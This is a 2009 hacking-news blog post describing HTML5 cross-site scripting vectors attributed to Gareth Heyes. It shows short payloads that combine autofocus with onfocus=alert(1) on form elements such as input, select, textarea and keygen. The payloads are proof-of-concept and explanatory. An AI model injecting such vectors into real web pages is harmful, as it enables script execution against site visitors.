Email Techs

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Saturday, 19 December 2009

New Html 5 XSS Vector’s By Gareth Heyes

Posted on 09:25 by Unknown

Gareth Heyes is a great security guy, as you can also visit his blog The Spanner. The newly released HTML 5 is now under the eyes of hackers and it wasn't late that the New Xss vectors have been released by Gareth Heyes .

 

New Html 5 XSS Vector’s By Gareth Heyes

 

These New Xss vectors according to Gareth are automatic in major Web Browsers from Safari, Chrome to Opera all support them. And its a matter of fact that Gareth also featured them on twitter too.

 

The injection looks something like:-

<input type="text" USER_INPUT>

 

The new HTML 5 works on some other vectors and uses, but the great thing in there is that you don't need to bind your Xss into a css style in here. HTML5 however lets us execute like expressions but without css styles….

 

For example:-

 

<input type="text" AUTOFOCUS onfocus=alert(1)>

 

We use the “autofocus” feature to focus our element and then the onfocus event to execute our XSS. This works with a plethora (I like that word) of tags. Any form based element it seems you can use this method:-

 

<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>

 html5

Conclusion

This New Xss vectors majorly uses the onfocus HTML 5 expression to make the use of Xss on the major browsers using HTML 5 right now like Safari, Chrome, Opera, Might be Firefox too.

Email ThisBlogThis!Share to XShare to Facebook
Posted in Hacking, Pro Hacks | No comments
Newer Post Older Post Home

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Popular Posts

  • New iPhone Worm That Attacks Jail Broken iPhones Also
    Well its again the iPhone which have come to the headlines again , But this time the apple is really pissed of with the kind of work the Ha...
  • Ophcrack Guide : Hack Any Password In Windows
    There might be many times you have heard of Ophcrack, now what is actually it well is a popular to crack passwords in windows. Many...
  • ‘New Moon” Fans Beware Of Hackers
    We are Getting Constant Rumors from many places that Hackers are going to target the the fans of the upcoming movie “New Moon” ...
  • Modern Warfare 2 Hacked By Hackers Now Up For Sale
    Looks like our hackers mate out there have now come with some cool shit, Its the New COD : MODERN WARFARE 2 which is the continuation o...
  • Official Indian Army Website –“Safe From Hackers”
    The new website for the Indian army (IA) have been launched and the authorities are saying it is really safe from any Hackers Activity. ...
  • Dear Mozilla, Please “DONT” fix this. [Pic]
    Today only i found this pic on Digg and i thought there should be a “DONT” in it. isn't it ? ..
  • Norton And Kaspersky On Commercial Fight For Security Suit’s 2010
    When there is Cyber crime there are antivirus and after that there is a fight in between them. You all be knowing about the two most pop...
  • Ubisoft Hacked : Fake or Real ?
    Some days ago we got news about Ubisoft being hacked by some hackers and was being believed till yet but after then some news breached out...
  • Peer Block : Safeguard Yourself From Harmful Server’s
    Have you ever heard of a software called Peer Guardian . So do you know what it is actually well here is the guide for you guys. Peer G...
  • 30 Million Facebook, MySpace, and Orkut ID’s Hacked
    Hackers Have crossed the security boundaries of a widget and multi-social networking based company RockYou.com which host many users from s...

Categories

  • Broadband
  • cyberwar
  • Ebooks
  • email
  • Gamers
  • Guides
  • Hacked
  • Hacker The Dude News
  • Hacking
  • Hacking Software
  • keylogger
  • Misc
  • Mobie's
  • News
  • Orkut
  • PHP
  • Pics
  • Pro Hacks
  • Small Hacks
  • Stylize
  • Tools
  • Torrent
  • Tricks
  • Twitter
  • Video's
  • Virus's
  • Weekly Top 10 Internet Tools
  • Windows
  • XSS

Blog Archive

  • ►  2010 (32)
    • ►  March (7)
    • ►  February (3)
    • ►  January (22)
  • ▼  2009 (123)
    • ▼  December (34)
      • The Anatomy Of GSM Encryption Hack
      • Your Mobile Is In Danger : Karsten Nohl Cracks GSM...
      • WinScanX : A Simple, Fast and Portable Windows Aud...
      • Total Round Up For "Top 10 Sexy Hackers of 2009"
      • Christmas Present For Hackers [Pic]
      • Net Wars : New Challenge For Hackers [Video]
      • FBI Is Watching You : Now On Facebook, Twitter, Yo...
      • Process Hacker V1.9 Released
      • AWeber Hacked : Recent Data Compromise
      • RSnake's 2nd Take On DNS Rebinding
      • Finding IP address in Gmail From Email Header's
      • The Top Targeted Brands Of 2009 [Pic]
      • Bootkit : One Deadly Weapon In The Attacker Arsenal
      • Is Google Public DNS Safe ?
      • New Html 5 XSS Vector’s By Gareth Heyes
      • Keep Your Encrypted Notes Safe With Fsekrit
      • The Anatomy of the Twitter Hack - Twitter's DNS Se...
      • Wireshark v1.2.5 Released
      • 30 Million Facebook, MySpace, and Orkut ID’s Hacked
      • Hackers Slays Microsoft’s Forensics Toolkit
      • Torpig Domain Generator : Hackers Using Twitter Tr...
      • Motorola Droid Jailbroken By Hackers
      • The History of Hacking [Pic]
      • The Year's Most-Hacked Software – Forbes
      • Hackers Like Google Chrome OS
      • Co-NASA Websites Hacked With SQL Injections
      • OllyDbg Beta 2 Final Released
      • RSnake On DNS Rebinding [Video]
      • Is Your Son a Computer Hacker ?
      • Safe Yourself From XSS Attack : Microsoft Anti-Cro...
      • Hackers Now Attacking Swine Flu Patients – Fake Va...
      • Hackers Don’t Give A Shit [Pic]
      • Team Viewer 5 Beta Released
      • Basic XSS Cross Site Scripting Demo [Video]
    • ►  November (30)
    • ►  October (24)
    • ►  September (9)
    • ►  August (6)
    • ►  July (1)
    • ►  June (3)
    • ►  May (16)
Powered by Blogger.

About Me

Unknown
View my complete profile